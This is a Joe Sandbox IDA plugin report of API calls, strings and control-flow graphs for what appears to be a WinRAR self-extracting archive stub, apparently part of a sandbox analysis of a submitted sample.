                                                                    • Opcode ID: e675dd7a7bce4c038f5568302291a345f8fb2979e6a706430b9066b36f5d6071
                                                                    • Instruction ID: 0d91b33668fa6499e4ba3baee65e1e4907db8efff73b6d37c29a1519425a2152
                                                                    • Opcode Fuzzy Hash: e675dd7a7bce4c038f5568302291a345f8fb2979e6a706430b9066b36f5d6071
                                                                    • Instruction Fuzzy Hash: 57A2F872904285AEDF25DF68C895BEEBBA5EF05300F0C41BAED499B182D7309945CBF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3
                                                                    • String ID:
                                                                    • API String ID: 431132790-0
                                                                    • Opcode ID: 121a48ac56a15d7b475154da948805c4acdd5c94bc55f78252e110b18b719b6e
                                                                    • Instruction ID: e64737640af0225aec4d5370a675fdf7abc4330ab797d514363bde5e8150dae1
                                                                    • Opcode Fuzzy Hash: 121a48ac56a15d7b475154da948805c4acdd5c94bc55f78252e110b18b719b6e
                                                                    • Instruction Fuzzy Hash: F8D18271A083418FDB14DF28C84475ABBE1AF8A308F08496DFC899B642D775E905CB6A
                                                                    APIs
                                                                      • Part of subcall function 00D91366: GetDlgItem.USER32(00000000,00003021), ref: 00D913AA
                                                                      • Part of subcall function 00D91366: SetWindowTextW.USER32(00000000,00DC65F4), ref: 00D913C0
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DADC06
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DADC24
                                                                    • IsDialogMessageW.USER32(?,?), ref: 00DADC37
                                                                    • TranslateMessage.USER32(?), ref: 00DADC45
                                                                    • DispatchMessageW.USER32(?), ref: 00DADC4F
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DADC72
                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00DADC95
                                                                    • GetDlgItem.USER32(?,00000068), ref: 00DADCB8
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DADCD3
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00DC65F4), ref: 00DADCE6
                                                                      • Part of subcall function 00DAF77B: _wcslen.LIBCMT ref: 00DAF7A5
                                                                    • SetFocus.USER32(00000000), ref: 00DADCED
                                                                    • _swprintf.LIBCMT ref: 00DADD4C
                                                                      • Part of subcall function 00D94C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D94C13
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00DADDAF
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,00000800), ref: 00DADDD7
                                                                    • GetTickCount.KERNEL32 ref: 00DADDF5
                                                                    • _swprintf.LIBCMT ref: 00DADE0D
                                                                    • GetLastError.KERNEL32(?,00000011), ref: 00DADE3F
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 00DADE92
                                                                    • _swprintf.LIBCMT ref: 00DADEC9
                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00DE3482,00000200), ref: 00DADF1D
                                                                    • GetCommandLineW.KERNEL32(?,?,?,?,00DE3482,00000200), ref: 00DADF33
                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00DE3482,00000400,00000001,00000001,?,?,?,?,00DE3482,00000200), ref: 00DADF8A
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00DADFB2
                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,00DE3482,00000200), ref: 00DADFFA
                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000421C,00DE3482,00000400,?,?,?,?,00DE3482,00000200), ref: 00DAE023
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00DE3482,00000200), ref: 00DAE02C
                                                                    • _swprintf.LIBCMT ref: 00DAE05F
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE0BE
                                                                    • SetDlgItemTextW.USER32(?,00000065,00DC65F4), ref: 00DAE0D5
                                                                    • GetDlgItem.USER32(?,00000065), ref: 00DAE0DE
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00DAE0ED
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DAE0FC
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE1A9
                                                                    • _wcslen.LIBCMT ref: 00DAE1FF
                                                                    • _swprintf.LIBCMT ref: 00DAE229
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DAE273
                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DAE28D
                                                                    • GetDlgItem.USER32(?,00000068), ref: 00DAE296
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DAE2AC
                                                                    • GetDlgItem.USER32(?,00000066), ref: 00DAE2C6
                                                                    • SetWindowTextW.USER32(00000000,00DE589A), ref: 00DAE2E8
                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DAE348
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE35B
                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 00DAE3FE
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00DAE4CC
                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DAE50E
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DAE532
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Item$MessageText$Send$Window_swprintf$File$ErrorLast$DialogLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                    • API String ID: 3247240745-1712381250
                                                                    • Opcode ID: 5b705cd4548bc8b8ef6a968d28339a0f2f1ca5b4b0bbaa055034d27c3fcb8481
                                                                    • Instruction ID: 519d44c169f222101b438e7aa1f026434e0d84a2f53f1b26b6550dc48fb086da
                                                                    • Opcode Fuzzy Hash: 5b705cd4548bc8b8ef6a968d28339a0f2f1ca5b4b0bbaa055034d27c3fcb8481
                                                                    • Instruction Fuzzy Hash: FA42A371944385BEEB21AB64EC8AFFE3B6CEB06744F044015F645EA2D1CBB45A44CB71

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 273 da290a-da2941 call db1590 GetModuleHandleW 276 da2999-da2bfa 273->276 277 da2943-da2953 GetProcAddress 273->277 278 da2cda 276->278 279 da2c00-da2c0d call db9e7e 276->279 280 da296d-da297d GetProcAddress 277->280 281 da2955-da296b 277->281 283 da2cdc-da2d08 GetModuleFileNameW call d9e208 call da268b 278->283 279->283 290 da2c13-da2c41 GetModuleFileNameW CreateFileW 279->290 280->276 282 da297f-da2994 280->282 281->280 282->276 297 da2d0a-da2d16 call d9d076 283->297 292 da2ccc-da2cd8 CloseHandle 290->292 293 da2c47-da2c53 SetFilePointer 290->293 292->283 293->292 296 da2c55-da2c71 ReadFile 293->296 296->292 298 da2c73-da2c7f 296->298 307 da2d18-da2d23 call da28ab 297->307 308 da2d45-da2d6c call d9e27e GetFileAttributesW 297->308 300 da2ede-da2ee3 call db13f9 298->300 301 da2c85-da2ca4 298->301 304 da2cc1-da2cca call da23d6 301->304 304->292 313 da2ca6-da2cc0 call da28ab 304->313 307->308 315 da2d25-da2d35 307->315 316 da2d6e-da2d72 308->316 317 da2d76 308->317 313->304 322 da2d40-da2d43 315->322 316->297 320 da2d74 316->320 321 da2d78-da2d7d 317->321 320->321 323 da2d7f 321->323 324 da2db4-da2db6 321->324 322->308 322->316 327 da2d81-da2da8 call d9e27e GetFileAttributesW 323->327 325 da2dbc-da2dd3 call d9e252 call d9d076 324->325 326 da2ec3-da2edb call db10f9 324->326 339 da2e3b-da2e6e call d94c00 AllocConsole 325->339 340 da2dd5-da2e36 call da28ab * 2 call da0597 call d94c00 call da0597 call dac774 325->340 335 da2daa-da2dae 327->335 336 da2db2 327->336 335->327 337 da2db0 335->337 336->324 337->324 345 da2ebb-da2ebd ExitProcess 339->345 346 da2e70-da2eb5 GetCurrentProcessId AttachConsole call db6433 GetStdHandle WriteConsoleW Sleep FreeConsole 339->346 340->345 346->345
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32 ref: 00DA2937
                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DA2949
                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DA2973
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DA2C1D
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DA2C37
                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DA2C4B
                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00DC6F24,00000000), ref: 00DA2C69
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00DA2CCD
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00DA2CE6
                                                                    • CompareStringW.KERNEL32(00000400,00001001,00DC6F70,?,DXGIDebug.dll,?,00DC6F24,?,00000000,?,00000800), ref: 00DA2D3A
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00DC6F24,00000800,?,00000000,?,00000800), ref: 00DA2D64
                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00DA2DA0
                                                                      • Part of subcall function 00DA28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
                                                                      • Part of subcall function 00DA28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4
                                                                    • _swprintf.LIBCMT ref: 00DA2E12
                                                                    • _swprintf.LIBCMT ref: 00DA2E5E
                                                                    • AllocConsole.KERNEL32 ref: 00DA2E66
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00DA2E70
                                                                    • AttachConsole.KERNEL32(00000000), ref: 00DA2E77
                                                                    • _wcslen.LIBCMT ref: 00DA2E8C
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00DA2E9D
                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00DA2EA4
                                                                    • Sleep.KERNEL32(00002710), ref: 00DA2EAF
                                                                    • FreeConsole.KERNEL32 ref: 00DA2EB5
                                                                    • ExitProcess.KERNEL32 ref: 00DA2EBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite_wcslen
                                                                    • String ID: <$DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                    • API String ID: 270162209-1156125387
                                                                    • Opcode ID: 8278743bdf9c9eb6a5c39e3ba049a8e93f9f48cfc11d186d5fe396c90b5c9397
                                                                    • Instruction ID: 474ba09652c07ef4992beabe84bf69593d6d7bad68b7833ce34aa0da1ed39a5e
                                                                    • Opcode Fuzzy Hash: 8278743bdf9c9eb6a5c39e3ba049a8e93f9f48cfc11d186d5fe396c90b5c9397
                                                                    • Instruction Fuzzy Hash: C1D157B10083869BD7319F65D848FAFBBE8EB85704F50091DF5999B351CBB085489FB2

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00DAD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
                                                                      • Part of subcall function 00DAD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
                                                                      • Part of subcall function 00DAD864: IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
                                                                      • Part of subcall function 00DAD864: TranslateMessage.USER32(?), ref: 00DAD8A8
                                                                      • Part of subcall function 00DAD864: DispatchMessageW.USER32(?), ref: 00DAD8B2
                                                                    • GetDlgItem.USER32(00000068,00DF3CF0), ref: 00DAF81F
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00DAD099,00000001,?,?,00DADAB9,00DC82F0,00DF3CF0,00DF3CF0,00001000,00DD50C4,00000000,?), ref: 00DAF844
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DAF853
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00DC65F4), ref: 00DAF861
                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DAF87B
                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DAF895
                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DAF8D9
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DAF8E4
                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DAF8F7
                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DAF91E
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00DC769C), ref: 00DAF92D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                    • String ID: \
                                                                    • API String ID: 3569833718-2967466578
                                                                    • Opcode ID: 61743b91ca538b4dc7c808dadba43c19cb2b40c16c8e2fe8f678431e93f177ce
                                                                    • Instruction ID: 57ff2140d76a8ea444cec05adb04519ed42640c84c1711afe216c82fc06e84f1
                                                                    • Opcode Fuzzy Hash: 61743b91ca538b4dc7c808dadba43c19cb2b40c16c8e2fe8f678431e93f177ce
                                                                    • Instruction Fuzzy Hash: AD319EB1649301BFE3109B24DC4AFBB7BACEB46704F044919F5A1DA2D1D7A45908CBB6

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 868 dafafc-dafb2e call db1590 871 dafd7e-dafd95 call db10f9 868->871 872 dafb34-dafb40 call db6433 868->872 872->871 877 dafb46-dafb6e call db2640 872->877 880 dafb78-dafb89 877->880 881 dafb70 877->881 882 dafb8b-dafb92 880->882 883 dafb94-dafb9d 880->883 881->880 885 dafb9f-dafba3 882->885 884 dafbfa 883->884 883->885 887 dafbfe-dafc00 884->887 886 dafba6-dafbac 885->886 888 dafbae 886->888 889 dafbcd-dafbda 886->889 890 dafc02-dafc05 887->890 891 dafc07-dafc09 887->891 892 dafbb8-dafbc2 888->892 893 dafd53-dafd55 889->893 894 dafbe0-dafbe4 889->894 890->891 895 dafc1c-dafc32 call d9d848 890->895 891->895 896 dafc0b-dafc12 891->896 899 dafbb0-dafbb6 892->899 900 dafbc4 892->900 902 dafd59-dafd61 893->902 901 dafbea-dafbf4 894->901 894->902 906 dafc4b-dafc56 call d9bccb 895->906 907 dafc34-dafc41 call da4168 895->907 896->895 897 dafc14 896->897 897->895 899->892 904 dafbc6-dafbc9 899->904 900->889 901->886 905 dafbf6 901->905 902->887 904->889 905->884 913 dafc58-dafc6f call d9d563 906->913 914 dafc73-dafc80 ShellExecuteExW 906->914 907->906 912 dafc43 907->912 912->906 913->914 914->871 916 dafc86-dafc8c 914->916 917 dafc8e-dafc95 916->917 918 dafc9f-dafca1 916->918 917->918 920 dafc97-dafc9d 917->920 921 dafcb8-dafcd7 call db004d 918->921 922 dafca3-dafcac 918->922 920->918 923 dafd0e-dafd1a CloseHandle 920->923 921->923 939 dafcd9-dafce1 921->939 922->921 931 dafcae-dafcb6 ShowWindow 922->931 924 dafd2b-dafd39 923->924 925 dafd1c-dafd29 call da4168 923->925 929 dafd3b-dafd3d 924->929 930 dafd6d-dafd6f 924->930 925->924 937 dafd66 925->937 929->930 934 dafd3f-dafd45 929->934 930->871 936 dafd71-dafd73 930->936 931->921 934->930 938 dafd47-dafd51 934->938 936->871 940 dafd75-dafd78 ShowWindow 936->940 937->930 938->930 939->923 941 dafce3-dafcf4 GetExitCodeProcess 939->941 940->871 941->923 942 dafcf6-dafd00 941->942 943 dafd02 942->943 944 dafd07 942->944 943->944 944->923
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00DAFB35
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00DAFC78
                                                                    • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00DAFCB0
                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00DAFCEC
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00DAFD12
                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00DAFD78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                    • String ID: .exe$.inf
                                                                    • API String ID: 36480843-3750412487
                                                                    • Opcode ID: 45729ee068ad0399d7355e1282bc6dad340fd0d12df2d371bcf2f37999d4ac74
                                                                    • Instruction ID: a83054ce60574b0a713d53e5f9645e0766a46c54dbc4935d4e881097d029c1d4
                                                                    • Opcode Fuzzy Hash: 45729ee068ad0399d7355e1282bc6dad340fd0d12df2d371bcf2f37999d4ac74
                                                                    • Instruction Fuzzy Hash: AD61C2311083849ADB319FA1D880ABBBBE5EF86744F0848ADF9C5D7291DB70D985C772

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 945 dbcfab-dbcfc4 946 dbcfda-dbcfdf 945->946 947 dbcfc6-dbcfd6 call dc159c 945->947 949 dbcfec-dbd010 MultiByteToWideChar 946->949 950 dbcfe1-dbcfe9 946->950 947->946 954 dbcfd8 947->954 952 dbd1a3-dbd1b6 call db10f9 949->952 953 dbd016-dbd022 949->953 950->949 955 dbd076 953->955 956 dbd024-dbd035 953->956 954->946 959 dbd078-dbd07a 955->959 960 dbd037-dbd046 call dc4660 956->960 961 dbd054-dbd065 call dbbc8e 956->961 963 dbd198 959->963 964 dbd080-dbd093 MultiByteToWideChar 959->964 960->963 970 dbd04c-dbd052 960->970 961->963 971 dbd06b 961->971 969 dbd19a-dbd1a1 call dbd213 963->969 964->963 968 dbd099-dbd0ab call dbd5bc 964->968 975 dbd0b0-dbd0b4 968->975 969->952 974 dbd071-dbd074 970->974 971->974 974->959 975->963 977 dbd0ba-dbd0c1 975->977 978 dbd0fb-dbd107 977->978 979 dbd0c3-dbd0c8 977->979 980 dbd109-dbd11a 978->980 981 dbd153 978->981 979->969 982 dbd0ce-dbd0d0 979->982 985 dbd11c-dbd12b call dc4660 980->985 986 dbd135-dbd146 call dbbc8e 980->986 983 dbd155-dbd157 981->983 982->963 984 dbd0d6-dbd0f0 call dbd5bc 982->984 987 dbd159-dbd172 call dbd5bc 983->987 988 dbd191-dbd197 call dbd213 983->988 984->969 998 dbd0f6 984->998 985->988 1000 dbd12d-dbd133 985->1000 986->988 1001 dbd148 986->1001 987->988 1002 dbd174-dbd17b 987->1002 988->963 998->963 1003 dbd14e-dbd151 1000->1003 1001->1003 1004 dbd17d-dbd17e 1002->1004 1005 dbd1b7-dbd1bd 1002->1005 1003->983 1006 dbd17f-dbd18f WideCharToMultiByte 1004->1006 1005->1006 1006->988 1007 dbd1bf-dbd1c6 call dbd213 1006->1007 1007->969
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DB7F99,00DB7F99,?,?,?,00DBD1FC,00000001,00000001,62E85006), ref: 00DBD005
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DBD1FC,00000001,00000001,62E85006,?,?,?), ref: 00DBD08B
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DBD185
                                                                    • __freea.LIBCMT ref: 00DBD192
                                                                      • Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0
                                                                    • __freea.LIBCMT ref: 00DBD19B
                                                                    • __freea.LIBCMT ref: 00DBD1C0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1414292761-0
                                                                    • Opcode ID: 6c357f476654f2a189d7b189f858a01382c7aeaecf166a2d29e2b94c3b3da86d
                                                                    • Instruction ID: 3907c1a7a8afb1f05fa12d7db6a029be2bfdb1467b4f70e5b06c077cd7c9712a
                                                                    • Opcode Fuzzy Hash: 6c357f476654f2a189d7b189f858a01382c7aeaecf166a2d29e2b94c3b3da86d
                                                                    • Instruction Fuzzy Hash: D1518072610316EBDB259E68CC41EFB77ABEB44790F194629FC06D6150EB34DC81C6B0

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00DA28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
                                                                      • Part of subcall function 00DA28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4
                                                                    • OleInitialize.OLE32(00000000), ref: 00DACCF2
                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DACD29
                                                                    • SHGetMalloc.SHELL32(00DDC460), ref: 00DACD33
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                    • String ID: riched20.dll$3To
                                                                    • API String ID: 3498096277-2168385784
                                                                    • Opcode ID: 7f7c350451b6cb8d270a0e02e285a62133829e201c21004bb99e2b1007028297
                                                                    • Instruction ID: d898e9c619b93e694c665ba0e65683b4b7c6935f3ee11bdefaeb96a4a4918f6a
                                                                    • Opcode Fuzzy Hash: 7f7c350451b6cb8d270a0e02e285a62133829e201c21004bb99e2b1007028297
                                                                    • Instruction Fuzzy Hash: 23F0F9B5D00209ABDB10AF9AD8499EFFBFCEF94704F00845AE415E2251DBB85649CBB1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
